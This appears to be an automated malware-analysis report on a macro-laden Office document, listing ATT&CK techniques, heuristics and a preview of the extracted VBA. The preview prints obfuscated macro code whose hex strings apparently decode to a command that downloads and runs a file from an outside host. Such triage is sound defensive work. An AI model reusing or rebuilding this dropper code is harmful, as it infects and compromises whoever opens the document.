Verdict: MALICIOUS
Risk Score: 264
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is an Office document containing VBA macros, including a Document_Open and Workbook_Open macro, which are known to be used for malicious purposes. The critical OLE_VBA_SHELL heuristic indicates the use of the Shell() function, suggesting the execution of arbitrary code. The macros appear to be obfuscated, but the presence of these heuristics strongly suggests the file's intent is to download and execute a second-stage payload.
Heuristics (8)
- ClamAV: Xls.Malware.Cwsp-6735643-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7305 bytes |

SHA-256: 5bb02c0447cd5b0faf6f645c700640fe4a23251d5f746a71ec608ffa14e43428

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 23 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub FJ_X()
Dim ZPA_BT As String
Dim R_UWS As String
Dim YZP_PI As Long
Dim N_DW As String
N_DW = N_DW + "AEADB5A"
N_DW = N_DW + "3B0B1A6"
N_DW = N_DW + "A3AAAA6"
N_DW = N_DW + "CA3B6A3"
N_DW = N_DW + "5E6B95A"
N_DW = N_DW + "7ACA2AD"
N_DW = N_DW + "B591B2B"
N_DW = N_DW + "7AAA35E"
N_DW = N_DW + "86A7A2A"
N_DW = N_DW + "2A3AC5E"
N_DW = N_DW + "6BACADA"
N_DW = N_DW + "EB0ADA4"
N_DW = N_DW + "A7AAA35E"
N_DW = N_DW + "87A45E66B2A3B1B26BAE9FB2A65E5E62A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A365675EB990A3ABADB4A36B87B2A3AB5E5E62A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A365BB795E628D"
Dim G_S As String
G_S = "83898F825E7B5E8CA3B56B8DA0A8A3A1B25E91B7B1B2A3AB6C8CA3B26C95A3A081AAA7A3ACB2795E628D83898F826C86A39FA2A3B0B1996593B1A3B06B7FA5A3ACB2659B5E7B5E659391906B898A65795E628D83898F826C"
Dim K_ZK As String
K_ZK = "82ADB5ACAAAD9FA284A7AAA36665A6B2B2AEB1786D6DB1A3AEAEB0ADA26CA1ADAB6DA8B2A4ADB0A1A39DB1A7A5ACA3A26CA3B6A3656A5E62A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A36567795E668CA3B5"
Dim OYL_T As String
OYL_T = "6B8DA0A8A3A1B25E6BA1ADAB5E91A6A3AAAA6C7FAEAEAAA7A19FB2A7ADAC676C91A6A3AAAA83B6A3A1B3B2A36662A3ACB4787F8E8E827F927F5E695E659AB56EA9AA6CA3B6A36567795E91B2ADAE6B8EB0ADA1A3B1B15E6B87A25E628EA7A25E6B84ADB0A1A3"
Dim ZH_UGA As String
ZH_UGA = N_DW & G_S & K_ZK & OYL_T
GoTo x2
x1:
Dim RAX_WEH As String
RAX_WEH = "7D7C7D7D657D7D7D857D7B7D5C757D7D7D6D7D7D57AC9C61AF7D55A2447DBC7D765E7DBA7C7D437D7D5F9763477D4A7D767D7D7D62A69A7D607DAC7E5E7D4C7D7DA44E5A7D657D6D898B437DA65748B47D7D447D7D527D757D7D7D75547D3E7D557D7D7D7D5A7DB97D7D59957D8B477D7DB05F7D8A7D7D"
Dim CII_Q As String
CII_Q = "7DAAA77D7D577D8A7E7D7DAAA27D7D517D7D7D797D7D7D797DB15C597D757D7D7D427D7D7D997D5A7D547DA37D9D9D7D4B40B97D4E7D7D6C7D607D7DAB465A857DA97D3F7D7DB48B5D7D7D7D7D7D517D977D738D7D507D49629149777DB89F4C7D5C7D7D7D7DBAAC427D7D806C7D967D4D79857D7D7D7D"
Dim NJ_TK As String
NJ_TK = "7D7D7D7B7D7B7D7DAA7D6A7D495D7D927D884D7D7D7D7D5A68A8707D787D7D95AD807D7C7D7D7D7D7DB1A47D7D7D857D844A7D7D547D8A80AA5179B07D7D6C6D7D7D7D7D547D517D7DA767987778617DBD6CB9407E7D7D7D7DB77D7DB66D7D76AF6D7E7D7D6E683EB0BD4E80607D707D567D65917D6BB0"
Dim LC_XUF As String
LC_XUF = "5C595B57A67D925C7DB67D7D487D7D7D8C41B97D7D7D92B353847D7D467D7D827D60B87D557D6F5C9FAE7D6F7D657DA37D8D757D7D7DA5415F7D7D7DA87D8C7D517D757F87AE9D4E7D82565C7D59626E8C8D7D487D7D72517D7BAF7D7D7D7D967D47B67D7D4C7D6B907D7BA17D417D7DADA47D597D828E"
Dim O_TK As String
O_TK = "9EB6627D4A7D7D747DBB7D837DAA7D7D9FB77D7DB37D657D827D9CB0A37D987D7D557DBAAB7D6C7D947D7D697D467D407D887D7D7D967D7D427D5E717D727DA37D757D6A507D887D7D7D7D7D7D797D997D587D7D479E6A7D7DA7564B7D7DAD537D4B7DA27D7DB677787D7D577D3E627D6F7D66577D7D7D"
Dim FRT_OOM As String
FRT_OOM = "9D7D7DA6A57AA74CA07D737DA87D7D7D7D7DB27D507D837D7DA8947374A47D437F714D7D7D697D7D7D7D905F7D8E90B4657D706A8A7D4F617D9E7D7D4A7D7DA9AE7D837D7D7D8640997D7DA873A3557D4C7F717D7D607D7D7DB5417D867D7D5F497D7D7E957D677D7D9A6EAF688C7D6B7D7D767D7DBD7D"
Dim KBM_W As String
KBM_W = "7D3E7D7D7D7D7D4A7D5197A47D7D7D877D7D7D7D7DB067B4BB7D4C7D4C928D6F7A8C9556687E59B0627D547D64707D7D7D7D437D7D7DAA7D7D7D717D7D9D7D7D48727DBD7D6EB77D7D917D7D99728D897D787D4D8C92B58E7D7DAE7D4B667D7D4B957D7DB180807D7DBD90A4947D70B1777D7D7D7D7DAE"
Dim U_HV As String
U_HV = "7D7DAC7D7D7D7DB6BC7D7D41879B7D7D3E7D7D3F4F7D807D7DA463697D62AF7D7372437DB87D7D447D7D7D6D677D4F887D7D4F7D7D7DB1986F7DB091902A8B5951677D4ABA417D7D6BA4B39FA57D527D8C7D9D847D7D7D888779777D7D7D7D51537D7D7B6A7D727D827D7D7D7D7D7DAFB2657D7D7D7D7D"
Dim BTL_PI As String
BTL_PI = "707D537DBD7D7D927D7D7D607D69AC7D837D8F7D8A8FB04EB07D7D7B7D513EB97D7D7D7D7D9F67B36F4EA97D907C7DA57D977DAE7DB9907D7D4A7D6954777D7D6667527D7D607D6F6649597E457F5EAF7D7D7D924884967B5D7C7DB27D9C7D8A7D7D6668657DB07DB8867D9E4
... (truncated)